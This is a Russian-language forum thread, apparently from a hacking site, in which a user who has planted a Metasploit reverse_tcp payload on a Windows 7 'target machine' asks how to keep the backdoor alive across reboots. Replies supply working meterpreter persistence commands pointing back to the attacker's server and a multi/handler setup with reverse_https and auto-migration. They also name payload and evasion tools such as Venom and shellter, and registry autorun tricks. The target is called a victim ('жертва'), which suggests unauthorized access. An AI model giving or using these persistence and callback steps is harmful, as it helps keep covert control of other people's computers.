![]() |
Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл(((( Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект? Заранее благодарен |
Цитата:
|
Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113? После ключа L указывать место расположение бэкдора в системе? |
Цитата:
Поясняю если ты вбил в троян стучать на твой локальный ip который начинается на 192.168........ у тебя будет все работать тольько в локальной(местной) сети но как только жертва от нее уйдет сессии не будет! троян будет отстукивать но кому то другому с таким же адресом.. ПС у меня мечта завлодеть постоянными IP такие как 192.168.1.~ и т.д.))) и ломать ничего не нужно сами все стучатся!))) [doublepost=1497445759,1497445527][/doublepost] Цитата:
|
Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(
|
Цитата:
|
Вроде получилось
|
а по пробуй-ка автомиграт и автоперсистенс, а если это не поможет тогда netcat
[doublepost=1497458817,1497447393][/doublepost]Automigrate msf>use exploit/multi/handler msf>set payload windows/meterpreter/reverse_https msf>set AutoRunScript post/windows/manage/migrate msf>set lhost msf> set lport msf>exploit этот пост тоже почитай пригодится! |
Блин - при запуске Venom вылезла ошибка
Как ее победить? Буду признателен за любые мысли https://forum.antichat.xyz/attachmen...52a037135a.png |
а вы из под sudo запустили если да то это ruby дурит голову.... обновите ОС если проблема не решилась велкам))
|
Спасибо) С судо не прокатило - решил делать нагрузку на виртуалке - а отстук - на вдс, пока проблема не решена. Буду думать.
Читал вашу статью про тотальное заражение сети - есть вопрос по shellter - он работает тока под вин? Может он есть на гитхабе или где его взять под Кали? Из репозиториев не получилось установить - пишет нет такого пакета |
shellter здесь работает на кали с вайном и странно что он у Вас не установился.. из репозиториев
|
спрошу тут,чтобы не плодить новые темы: как через MP добавить запись в реестр ? Если верить хелпу, с ключом createkey мы добавляем путь, а с ключом -t значение. Путь вроде добавляется,а вот значение никак не могу добавить
|
Можно так
How to make a persistent backdoor (Metasploit / Kali Linux) |
| Время: 17:15 |